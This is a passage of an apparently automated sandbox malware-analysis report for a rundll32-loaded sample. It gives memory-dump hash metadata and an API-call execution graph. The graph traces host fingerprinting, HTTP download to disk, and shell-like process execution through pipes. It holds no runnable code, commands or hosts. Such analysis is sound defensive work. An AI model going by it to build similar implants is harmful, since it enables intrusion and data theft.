                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Yarn$Locinfo::_$LocinfoLockitstd::bad_exception::bad_exception$ExceptionGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwcodecvtstd::locale::facet::facet
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2580637281-0
                                                                                                                                                                                • Opcode ID: adcdcac3d387f150fc2c396cd21c3c6a73979b2da0c270e4eb99f33f457a8872
                                                                                                                                                                                • Instruction ID: 90b5072c9463a7c30c8fdc9e96004994b1373203bc5035fe7df1573c3d2cf706
                                                                                                                                                                                • Opcode Fuzzy Hash: adcdcac3d387f150fc2c396cd21c3c6a73979b2da0c270e4eb99f33f457a8872
                                                                                                                                                                                • Instruction Fuzzy Hash: F5F0EC72229FC191DB61AB25F4517DE7362F7D17A4F405211AAED436EACF38C548CB01
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 875692556-336475711
                                                                                                                                                                                • Opcode ID: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                                                                • Instruction ID: c1e6c128f83d5d150235217ef6e3b83946c04e6832c1f20ea61eae0dd66acaca
                                                                                                                                                                                • Opcode Fuzzy Hash: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                                                                • Instruction Fuzzy Hash: 9741A731218E4C4FDB58EF28D8897F973E2F794314F4946AEAC4AC3196DE20D90286C5
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 875692556-336475711
                                                                                                                                                                                • Opcode ID: b6f76ccc677749e7e47c8f1fd9208b4adf8ad809ee0fda7590a67167e05195a0
                                                                                                                                                                                • Instruction ID: da916b8d5daa8e6613b7a6b5f644ad2fdbbb7711bbefa768b2c4aa1dfe5b2c04
                                                                                                                                                                                • Opcode Fuzzy Hash: b6f76ccc677749e7e47c8f1fd9208b4adf8ad809ee0fda7590a67167e05195a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2741A631218E4C4FDB58EF28D8857F973E2FB54315F5946AEA84AC3196DE20A80286C5
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocswprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 2734600178-1402515088
                                                                                                                                                                                • Opcode ID: 0b52692e544fc50670088c299cef916147423b381afed6a016f19d8ad1928563
                                                                                                                                                                                • Instruction ID: 532205f4f8cc9ab925bfb1dfdab9f8ac0293af74fddfd5a47903375fbd33469a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b52692e544fc50670088c299cef916147423b381afed6a016f19d8ad1928563
                                                                                                                                                                                • Instruction Fuzzy Hash: EE515C32719F8086EB12DB75E8503DE63B2EB85798F504216EE5D57B9ADF38C446C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocswprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 2734600178-1402515088
                                                                                                                                                                                • Opcode ID: 4d8b598d66f7e2c92a40726d1b63a1af653c1d6d07b5135ad9993eb8cba31dca
                                                                                                                                                                                • Instruction ID: ef499addac98c1aa2a15bac25648fa71e4c98099214861c5ba65c01d8b3c234d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d8b598d66f7e2c92a40726d1b63a1af653c1d6d07b5135ad9993eb8cba31dca
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B514C32719FC086EB12CB75E8403DD63B2EB89798F504216DE9957B9AEF38C046C710
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocswprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 2734600178-1402515088
                                                                                                                                                                                • Opcode ID: 4ecb6063488c6e6240f3922736982e1e2cd0c6d48fa5f7eaa1debd812ab1ff6c
                                                                                                                                                                                • Instruction ID: d7a3d2378f2806dcba21cf1cdde44593a6e23967d744e8d7003a7efef50fa462
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ecb6063488c6e6240f3922736982e1e2cd0c6d48fa5f7eaa1debd812ab1ff6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 55517A32B19FC08AEB12CB75E4503DD67B2E799798F504216EE5927B9ADF38C04AC740

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:53.8%
                                                                                                                                                                                Signature Coverage:7.8%
                                                                                                                                                                                Total number of Nodes:1096
                                                                                                                                                                                Total number of Limit Nodes:34
                                                                                                                                                                                execution_graph 60658 e625cf0 60659 e625d01 60658->60659 60660 e625d7c 60658->60660 60659->60660 60667 e627708 GetTempPathA 60659->60667 60662 e625d10 CopyFileA 60662->60660 60664 e625d25 60662->60664 60663 e625d71 DeleteFileA 60663->60660 60664->60663 60672 e677ee8 60664->60672 60666 e625d65 60666->60663 60668 e627733 lstrcatA lstrlenA 60667->60668 60670 e62774f 60667->60670 60668->60670 60669 e627896 lstrcatA lstrlenA 60669->60662 60670->60669 60671 e62785e wsprintfA 60670->60671 60671->60669 60673 e677f16 _cwprintf_s_l 60672->60673 60674 e677f1a _cwprintf_s_l 60673->60674 60679 e67815a 60673->60679 60681 e678124 _cwprintf_s_l 60673->60681 60682 e67cff8 CloseHandle 60673->60682 60683 e64c5f4 CloseHandle _cwprintf_s_l 60673->60683 60684 e64a968 CloseHandle 60673->60684 60674->60666 60686 e64a968 CloseHandle 60679->60686 60681->60674 60685 e64a968 CloseHandle 60681->60685 60682->60673 60683->60673 60684->60673 60685->60674 60686->60681 60687 31143c4 60692 31141b4 60687->60692 60689 31143eb 60690 31143cd 60690->60689 60713 311c704 NtDelayExecution 60690->60713 60693 31141d4 60692->60693 60714 3116cb4 60693->60714 60695 31141dd 60695->60690 60696 31141d9 60696->60695 60697 31141fa GetCurrentProcess IsWow64Process 60696->60697 60697->60695 60698 3114227 60697->60698 60726 3117274 GetAdaptersInfo 60698->60726 60700 311422c 60700->60695 60701 3114266 CreateMutexW 60700->60701 60701->60695 60702 3114286 GetLastError 60701->60702 60702->60695 60703 31142ac GetModuleHandleW 60702->60703 60733 3114c2c GetModuleHandleW GetCurrentProcessId 60703->60733 60710 31142ec CreateThread 60711 3114317 60710->60711 61236 31143f4 60710->61236 60756 3116c6c CreateThread 60711->60756 60713->60690 60715 3116cbd 60714->60715 60725 3116cf3 60715->60725 60758 311abe8 GetProcAddress GetProcAddressForCaller 60715->60758 60717 3116ccf 60717->60725 60759 31199d0 GetProcAddress GetProcAddressForCaller 60717->60759 60719 3116cd8 60719->60725 60760 311aa0c 60719->60760 60723 3116cea 60723->60725 60765 311b2a4 GetProcAddress GetProcAddressForCaller 60723->60765 60725->60696 60727 31172d1 60726->60727 60728 31172ad 60726->60728 60732 31172df 60727->60732 60768 31182b4 60727->60768 60766 311b388 NtAllocateVirtualMemory 60728->60766 60731 31172b8 GetAdaptersInfo 60731->60727 60732->60700 60771 31182f4 60733->60771 60737 3114c7f 60739 3114d17 GetCurrentProcessId 60737->60739 60740 3114d33 60737->60740 60741 3114cf3 60737->60741 60739->60737 60742 3114d44 60740->60742 60743 31142c1 60740->60743 60741->60737 60781 311891c RtlGetVersion GetVersionExW 60741->60781 60782 3114d58 CloseHandle 60742->60782 60743->60695 60745 3117314 60743->60745 60746 311b388 NtAllocateVirtualMemory 60745->60746 60747 311732c 60746->60747 60811 311bfc0 60747->60811 60749 311737f 60750 311bfc0 NtAllocateVirtualMemory 60749->60750 60751 31142d1 60750->60751 60751->60695 60752 31171f0 60751->60752 60753 3117208 60752->60753 60754 311bfc0 NtAllocateVirtualMemory 60753->60754 60755 31142e1 60754->60755 60755->60695 60755->60710 60757 3116ca3 60756->60757 60814 3115a64 60756->60814 60757->60695 60758->60717 60759->60719 60763 311ab3d 60760->60763 60761 3116ce1 60761->60725 60764 3119350 GetProcAddress GetProcAddressForCaller 60761->60764 60762 311a8e0 7 API calls 60762->60763 60763->60761 60763->60762 60764->60723 60765->60725 60767 311b3c8 60766->60767 60767->60731 60769 31182ef 60768->60769 60770 31182ce NtFreeVirtualMemory 60768->60770 60769->60732 60770->60769 60783 3118c30 60771->60783 60776 3118d3c 60809 311b470 60776->60809 60779 3118d87 60779->60737 60780 3118d6e wsprintfA 60780->60779 60781->60741 60782->60743 60784 3118c4e 60783->60784 60785 3118c60 FindFirstVolumeW 60784->60785 60786 3118c81 GetVolumeInformationW FindVolumeClose 60785->60786 60787 31182fd 60785->60787 60786->60787 60788 3118e18 60787->60788 60789 3118e41 60788->60789 60798 3118fc8 60789->60798 60792 3114c73 60792->60776 60793 311b388 NtAllocateVirtualMemory 60794 3118e63 60793->60794 60795 3118e91 60794->60795 60803 311be64 60794->60803 60797 31182b4 NtFreeVirtualMemory 60795->60797 60797->60792 60799 311b388 NtAllocateVirtualMemory 60798->60799 60800 3118fe4 60799->60800 60801 3118e4b 60800->60801 60807 3118ec8 wsprintfA 60800->60807 60801->60792 60801->60793 60804 311be7c 60803->60804 60808 311beac NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 60804->60808 60806 311bea5 60806->60795 60807->60801 60808->60806 60810 3118d5a GetUserNameA 60809->60810 60810->60779 60810->60780 60812 311b388 NtAllocateVirtualMemory 60811->60812 60813 311bfdc 60812->60813 60813->60749 60817 3115aed 60814->60817 60816 3115ba7 60821 3115b5a new[] 60817->60821 60918 311c704 NtDelayExecution 60817->60918 60820 31182b4 NtFreeVirtualMemory 60820->60821 60821->60816 60826 3115c2f new[] 60821->60826 60827 311bfc0 NtAllocateVirtualMemory 60821->60827 60830 311be64 3 API calls 60821->60830 60832 311b388 NtAllocateVirtualMemory 60821->60832 60844 31182b4 NtFreeVirtualMemory 60821->60844 60855 3115484 InternetCrackUrlA NtFreeVirtualMemory NtAllocateVirtualMemory 60821->60855 60856 3118424 60821->60856 60882 311b770 60821->60882 60890 3116fc0 NtAllocateVirtualMemory 60821->60890 60891 3114e28 60821->60891 60907 3116cfc NtAllocateVirtualMemory 60821->60907 60908 3115734 60821->60908 60919 3118bdc GetCursorPos GetTickCount RtlRandom 60821->60919 60822 311bfc0 NtAllocateVirtualMemory 60822->60826 60823 3116404 wsprintfA 60823->60826 60824 3115f36 wsprintfA 60824->60821 60825 3116025 wsprintfA 60825->60821 60826->60820 60826->60821 60826->60822 60826->60823 60826->60824 60826->60825 60829 31182b4 NtFreeVirtualMemory 60826->60829 60833 311b388 NtAllocateVirtualMemory 60826->60833 60834 311b388 NtAllocateVirtualMemory 60826->60834 60837 311b388 NtAllocateVirtualMemory 60826->60837 60843 31182b4 NtFreeVirtualMemory 60826->60843 60847 31169a2 GetExitCodeThread 60826->60847 60849 31169de GetExitCodeThread 60826->60849 60850 311c704 NtDelayExecution 60826->60850 60851 311b388 NtAllocateVirtualMemory 60826->60851 60853 311be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 60826->60853 60854 3116fc0 NtAllocateVirtualMemory 60826->60854 60920 3118bdc GetCursorPos GetTickCount RtlRandom 60826->60920 60827->60821 60829->60821 60830->60821 60832->60821 60835 3116187 WideCharToMultiByte 60833->60835 60838 3116243 WideCharToMultiByte 60834->60838 60836 311be64 3 API calls 60835->60836 60836->60826 60839 31162ff WideCharToMultiByte 60837->60839 60840 311be64 3 API calls 60838->60840 60841 311be64 3 API calls 60839->60841 60840->60826 60841->60826 60843->60826 60844->60821 60847->60826 60849->60826 60850->60826 60851->60826 60853->60826 60854->60826 60855->60821 60857 311b388 NtAllocateVirtualMemory 60856->60857 60858 3118452 60857->60858 60859 3118466 GetAdaptersInfo 60858->60859 60860 311845f 60858->60860 60861 311865b 60859->60861 60862 311848d 60859->60862 60860->60821 60864 3118688 60861->60864 60866 31182b4 NtFreeVirtualMemory 60861->60866 60863 311b388 NtAllocateVirtualMemory 60862->60863 60865 3118498 GetAdaptersInfo 60863->60865 60867 311b388 NtAllocateVirtualMemory 60864->60867 60868 31184c5 60865->60868 60866->60864 60869 311869b 60867->60869 60872 31184e6 wsprintfA 60868->60872 60869->60860 60870 31186ac GetComputerNameExA 60869->60870 60871 3118729 GetComputerNameExA 60870->60871 60875 31186c5 60870->60875 60873 31187db 60871->60873 60876 3118746 60871->60876 60879 3118502 60872->60879 60874 31182b4 NtFreeVirtualMemory 60873->60874 60874->60860 60877 31186fa wsprintfA 60875->60877 60878 31187a6 wsprintfA 60876->60878 60877->60871 60878->60873 60879->60861 60880 3118627 wsprintfA 60879->60880 60881 31185b2 wsprintfA 60879->60881 60880->60861 60880->60879 60881->60879 60883 311b7aa 60882->60883 60884 311b7b5 60883->60884 60886 311b7f0 60883->60886 60921 311c00c NtAllocateVirtualMemory 60883->60921 60884->60826 60888 311b822 60886->60888 60922 311c00c NtAllocateVirtualMemory 60886->60922 60888->60884 60923 311c00c NtAllocateVirtualMemory 60888->60923 60890->60821 60893 3114e5d 60891->60893 60897 3114ec6 60893->60897 60898 3114fc6 60893->60898 60904 31182b4 NtFreeVirtualMemory 60893->60904 60905 3115022 60893->60905 60924 3115484 InternetCrackUrlA NtFreeVirtualMemory NtAllocateVirtualMemory 60893->60924 60925 3115078 60893->60925 60930 3115160 8 API calls 60893->60930 60894 3114d78 InternetOpenW InternetConnectA 60894->60897 60895 31182b4 NtFreeVirtualMemory 60895->60897 60896 311bfc0 NtAllocateVirtualMemory 60896->60897 60897->60893 60897->60894 60897->60895 60897->60896 60897->60898 60899 3115057 60898->60899 60900 311504c InternetCloseHandle 60898->60900 60902 311506a 60899->60902 60903 311505f InternetCloseHandle 60899->60903 60900->60899 60902->60821 60903->60902 60904->60893 60905->60898 60907->60821 60909 3115792 60908->60909 60910 311bfc0 NtAllocateVirtualMemory 60909->60910 60916 31157b3 60910->60916 60911 31157c0 60911->60826 60913 3115a49 60914 31182b4 NtFreeVirtualMemory 60913->60914 60914->60911 60916->60911 60916->60913 60938 31144c8 60916->60938 60979 311cf4c NtFreeVirtualMemory 60916->60979 60980 311cde8 NtFreeVirtualMemory NtAllocateVirtualMemory 60916->60980 60918->60817 60919->60821 60920->60826 60921->60886 60922->60888 60923->60884 60924->60893 60926 31150bc InternetReadFile 60925->60926 60928 3115104 60926->60928 60929 31150de 60926->60929 60928->60897 60929->60926 60929->60928 60931 311b704 60929->60931 60930->60893 60932 311b733 60931->60932 60933 311b718 60931->60933 60937 311b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 60932->60937 60934 31182b4 NtFreeVirtualMemory 60933->60934 60936 311b725 60934->60936 60936->60929 60937->60936 60976 31144ec 60938->60976 60939 31147e3 60941 3114900 60939->60941 60942 31147ee 60939->60942 60940 3114799 60943 3114852 60940->60943 60944 31147a4 60940->60944 60995 3114334 SetEvent ReleaseMutex CloseHandle 60941->60995 60953 31149ec 60942->60953 60954 311480f 60942->60954 60970 31147de 60942->60970 60952 311bfc0 NtAllocateVirtualMemory 60943->60952 60946 311494c 60944->60946 60947 31147af 60944->60947 60999 3112b28 8 API calls 60946->60999 60950 3114931 60947->60950 60951 31147ba 60947->60951 60949 3114905 60955 3114839 60949->60955 60996 311c704 NtDelayExecution 60949->60996 60998 3112d50 18 API calls 60950->60998 60956 3114942 60951->60956 60957 31147c5 60951->60957 60977 3114870 60952->60977 60982 3117dfc 60953->60982 60960 31149f8 60954->60960 60961 311481a 60954->60961 60955->60970 60981 311321c CreateThread 60956->60981 60964 31147cc 60957->60964 60965 311483e 60957->60965 60968 3114a02 60960->60968 60960->60970 60961->60970 61001 3114a20 25 API calls 60961->61001 60966 31147d7 60964->60966 60967 311491d 60964->60967 60994 3117940 30 API calls 60965->60994 60966->60970 60971 311482a 60966->60971 60997 3117768 33 API calls 60967->60997 61000 3117f54 23 API calls 60968->61000 60970->60916 60993 3117c98 24 API calls 60971->60993 60976->60939 60976->60940 60977->60970 60978 31182b4 NtFreeVirtualMemory 60977->60978 60978->60970 60979->60916 60980->60916 60981->60970 61002 3113304 60981->61002 60983 3117e17 60982->60983 60984 3117e24 MultiByteToWideChar 60983->60984 61156 3117a84 60984->61156 60986 3117f40 60986->60970 60988 311b388 NtAllocateVirtualMemory 60989 3117eb6 60988->60989 60990 311b388 NtAllocateVirtualMemory 60989->60990 60991 3117ed9 CreateThread 60990->60991 60992 31182b4 NtFreeVirtualMemory 60991->60992 61215 311bb44 60991->61215 60992->60986 60993->60955 60994->60970 60995->60949 60996->60949 60997->60970 60998->60955 60999->60955 61000->60970 61001->60970 61003 3113349 61002->61003 61063 3113322 61002->61063 61004 311b388 NtAllocateVirtualMemory 61003->61004 61005 3113353 61004->61005 61005->61063 61120 3112164 61005->61120 61007 3113406 61008 3112164 21 API calls 61007->61008 61009 311349e 61008->61009 61010 3112164 21 API calls 61009->61010 61011 3113537 61010->61011 61012 3112164 21 API calls 61011->61012 61013 31135d0 61012->61013 61014 3112164 21 API calls 61013->61014 61015 3113669 61014->61015 61016 3112164 21 API calls 61015->61016 61017 3113702 61016->61017 61018 3112164 21 API calls 61017->61018 61019 311379b 61018->61019 61020 3112164 21 API calls 61019->61020 61021 3113834 61020->61021 61022 3112164 21 API calls 61021->61022 61023 31138cd 61022->61023 61024 3112164 21 API calls 61023->61024 61025 3113966 61024->61025 61026 3112164 21 API calls 61025->61026 61027 31139ff 61026->61027 61028 311b388 NtAllocateVirtualMemory 61027->61028 61029 3113a12 61028->61029 61031 3113ad6 61029->61031 61029->61063 61142 3116fc0 NtAllocateVirtualMemory 61029->61142 61032 3113b77 61031->61032 61143 3116fc0 NtAllocateVirtualMemory 61031->61143 61035 3113c18 61032->61035 61144 3116fc0 NtAllocateVirtualMemory 61032->61144 61036 3113cb9 61035->61036 61145 3116fc0 NtAllocateVirtualMemory 61035->61145 61040 3113d5a 61036->61040 61146 3116fc0 NtAllocateVirtualMemory 61036->61146 61038 3113a63 61038->61031 61047 311be64 3 API calls 61038->61047 61043 3113dfb 61040->61043 61147 3116fc0 NtAllocateVirtualMemory 61040->61147 61042 3113b04 61042->61032 61057 311be64 3 API calls 61042->61057 61044 3113e9c 61043->61044 61148 3116fc0 NtAllocateVirtualMemory 61043->61148 61051 3113f3d 61044->61051 61149 3116fc0 NtAllocateVirtualMemory 61044->61149 61045 3113ba5 61045->61035 61059 311be64 3 API calls 61045->61059 61054 3113abd 61047->61054 61049 3113c46 61049->61036 61069 311be64 3 API calls 61049->61069 61050 3114138 61153 3112988 NtFreeVirtualMemory 61050->61153 61055 3113fde 61051->61055 61150 3116fc0 NtAllocateVirtualMemory 61051->61150 61052 3113ce7 61052->61040 61071 311be64 3 API calls 61052->61071 61060 311be64 3 API calls 61054->61060 61058 311408b 61055->61058 61151 3116fc0 NtAllocateVirtualMemory 61055->61151 61064 3113b5e 61057->61064 61058->61050 61152 3116fc0 NtAllocateVirtualMemory 61058->61152 61067 3113bff 61059->61067 61068 3113acc 61060->61068 61061 3113d88 61061->61043 61080 311be64 3 API calls 61061->61080 61070 311be64 3 API calls 61064->61070 61066 3113e29 61066->61044 61083 311be64 3 API calls 61066->61083 61072 311be64 3 API calls 61067->61072 61073 31182b4 NtFreeVirtualMemory 61068->61073 61075 3113ca0 61069->61075 61076 3113b6d 61070->61076 61078 3113d41 61071->61078 61079 3113c0e 61072->61079 61073->61031 61074 3113eca 61074->61051 61092 311be64 3 API calls 61074->61092 61081 311be64 3 API calls 61075->61081 61082 31182b4 NtFreeVirtualMemory 61076->61082 61077 3113f6b 61077->61055 61095 311be64 3 API calls 61077->61095 61084 311be64 3 API calls 61078->61084 61085 31182b4 NtFreeVirtualMemory 61079->61085 61087 3113de2 61080->61087 61088 3113caf 61081->61088 61082->61032 61090 3113e83 61083->61090 61091 3113d50 61084->61091 61085->61035 61086 311400c 61086->61058 61102 311be64 3 API calls 61086->61102 61093 311be64 3 API calls 61087->61093 61094 31182b4 NtFreeVirtualMemory 61088->61094 61089 31140b9 61089->61050 61105 311be64 3 API calls 61089->61105 61096 311be64 3 API calls 61090->61096 61097 31182b4 NtFreeVirtualMemory 61091->61097 61098 3113f24 61092->61098 61099 3113df1 61093->61099 61094->61036 61100 3113fc5 61095->61100 61101 3113e92 61096->61101 61097->61040 61103 311be64 3 API calls 61098->61103 61104 31182b4 NtFreeVirtualMemory 61099->61104 61106 311be64 3 API calls 61100->61106 61107 31182b4 NtFreeVirtualMemory 61101->61107 61108 311406c 61102->61108 61109 3113f33 61103->61109 61104->61043 61110 3114119 61105->61110 61111 3113fd4 61106->61111 61107->61044 61112 311be64 3 API calls 61108->61112 61113 31182b4 NtFreeVirtualMemory 61109->61113 61114 311be64 3 API calls 61110->61114 61115 31182b4 NtFreeVirtualMemory 61111->61115 61116 311407e 61112->61116 61113->61051 61117 311412b 61114->61117 61115->61055 61118 31182b4 NtFreeVirtualMemory 61116->61118 61119 31182b4 NtFreeVirtualMemory 61117->61119 61118->61058 61119->61050 61121 31121e4 61120->61121 61122 31121f6 6 API calls 61121->61122 61154 3112134 61122->61154 61124 3112333 CreateProcessW 61125 311b388 NtAllocateVirtualMemory 61124->61125 61126 3112399 61125->61126 61127 311b388 NtAllocateVirtualMemory 61126->61127 61136 31123d6 61127->61136 61128 31125e8 61131 31125fa 61128->61131 61133 31182b4 NtFreeVirtualMemory 61128->61133 61129 3112401 PeekNamedPipe 61132 31124b9 PeekNamedPipe 61129->61132 61129->61136 61130 31125a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 61130->61128 61131->61007 61134 3112569 GetExitCodeProcess 61132->61134 61132->61136 61133->61131 61135 311258f 61134->61135 61134->61136 61135->61130 61136->61128 61136->61129 61136->61130 61136->61132 61136->61134 61138 3112468 ReadFile 61136->61138 61140 3112518 ReadFile 61136->61140 61155 311c704 NtDelayExecution 61136->61155 61139 311be64 3 API calls 61138->61139 61139->61132 61141 311be64 3 API calls 61140->61141 61141->61134 61142->61038 61143->61042 61144->61045 61145->61049 61146->61052 61147->61061 61148->61066 61149->61074 61150->61077 61151->61086 61152->61089 61153->61063 61154->61124 61155->61136 61163 3117ac4 61156->61163 61158 3117b28 61159 3117c5d 61158->61159 61160 31182b4 NtFreeVirtualMemory 61158->61160 61161 3117c68 61159->61161 61162 31182b4 NtFreeVirtualMemory 61159->61162 61160->61159 61161->60986 61161->60988 61162->61161 61163->61158 61167 3117c12 61163->61167 61169 311900c 61163->61169 61189 311c00c NtAllocateVirtualMemory 61163->61189 61167->61158 61167->61163 61168 3117c37 61167->61168 61190 31176d8 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 61167->61190 61191 3118240 RtlInitUnicodeString NtCreateFile NtWriteFile NtClose 61167->61191 61168->61158 61170 311904b InternetOpenW 61169->61170 61171 3119086 61170->61171 61172 311908b 61170->61172 61174 3119248 61171->61174 61175 311923d InternetCloseHandle 61171->61175 61192 31155dc 61172->61192 61177 3119250 InternetCloseHandle 61174->61177 61178 311925b 61174->61178 61175->61174 61177->61178 61178->61163 61179 31190f4 61180 3119106 61179->61180 61182 31182b4 NtFreeVirtualMemory 61179->61182 61183 3119118 InternetOpenUrlW 61180->61183 61184 31182b4 NtFreeVirtualMemory 61180->61184 61182->61180 61183->61171 61186 3119154 61183->61186 61184->61183 61185 311915f InternetReadFile 61185->61186 61186->61171 61186->61185 61187 311b388 NtAllocateVirtualMemory 61186->61187 61214 311b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 61186->61214 61187->61186 61189->61163 61190->61167 61191->61167 61193 3115614 61192->61193 61194 311b388 NtAllocateVirtualMemory 61193->61194 61195 311563a 61194->61195 61196 311b388 NtAllocateVirtualMemory 61195->61196 61197 3115650 InternetCrackUrlW 61196->61197 61198 31156ac 61197->61198 61202 31156c6 61197->61202 61199 31182b4 NtFreeVirtualMemory 61198->61199 61200 31156b9 61199->61200 61201 31182b4 NtFreeVirtualMemory 61200->61201 61201->61202 61202->61171 61202->61179 61203 311c860 61202->61203 61204 311c894 InternetConnectW 61203->61204 61205 311c8df 61203->61205 61204->61205 61206 311c8e4 HttpOpenRequestW 61204->61206 61207 311c9e0 61205->61207 61208 311c9d5 InternetCloseHandle 61205->61208 61206->61205 61209 311c936 HttpSendRequestW 61206->61209 61210 311c9f3 61207->61210 61211 311c9e8 InternetCloseHandle 61207->61211 61208->61207 61212 311c955 InternetQueryOptionW InternetSetOptionW 61209->61212 61213 311c9a7 HttpSendRequestW 61209->61213 61210->61179 61211->61210 61212->61213 61213->61205 61214->61186 61216 311bbc5 61215->61216 61217 311bb62 61215->61217 61218 311bb8e CreateFileMappingA 61217->61218 61218->61216 61219 311bbcc MapViewOfFile 61218->61219 61219->61216 61221 311bbff 61219->61221 61220 311bcd5 VirtualFree 61222 31182b4 NtFreeVirtualMemory 61220->61222 61221->61220 61223 311b388 NtAllocateVirtualMemory 61221->61223 61224 311bd06 UnmapViewOfFile CloseHandle 61222->61224 61225 311bc35 61223->61225 61224->61216 61226 311bc62 61225->61226 61227 311be64 3 API calls 61226->61227 61228 311bc87 61227->61228 61229 311be64 3 API calls 61228->61229 61230 311bc99 61229->61230 61231 311bfc0 NtAllocateVirtualMemory 61230->61231 61232 311bcaf 61231->61232 61233 31182b4 NtFreeVirtualMemory 61232->61233 61234 311bccb 61233->61234 61235 31182b4 NtFreeVirtualMemory 61234->61235 61235->61220 61237 3114411 61236->61237 61238 311bfc0 NtAllocateVirtualMemory 61237->61238 61239 3114444 61238->61239 61240 31144a4 61239->61240 61242 3114451 61239->61242 61243 311448f MessageBoxA 61239->61243 61241 31182b4 NtFreeVirtualMemory 61240->61241 61241->61242 61243->61240 61244 3118a58 61245 3118a72 61244->61245 61246 3118a79 61244->61246 61246->61245 61247 3118b63 GetProcAddress GetProcAddressForCaller 61246->61247 61247->61245 61248 311922b 61249 311904b InternetOpenW 61248->61249 61257 3119086 61248->61257 61250 311908b 61249->61250 61249->61257 61255 31155dc 3 API calls 61250->61255 61251 3119248 61253 3119250 InternetCloseHandle 61251->61253 61254 311925b 61251->61254 61252 311923d InternetCloseHandle 61252->61251 61253->61254 61256 31190ca 61255->61256 61256->61257 61258 31190f4 61256->61258 61260 311c860 8 API calls 61256->61260 61257->61251 61257->61252 61259 3119106 61258->61259 61261 31182b4 NtFreeVirtualMemory 61258->61261 61262 3119118 InternetOpenUrlW 61259->61262 61263 31182b4 NtFreeVirtualMemory 61259->61263 61260->61258 61261->61259 61262->61257 61265 3119154 61262->61265 61263->61262 61264 311915f InternetReadFile 61264->61265 61265->61257 61265->61264 61266 311b388 NtAllocateVirtualMemory 61265->61266 61268 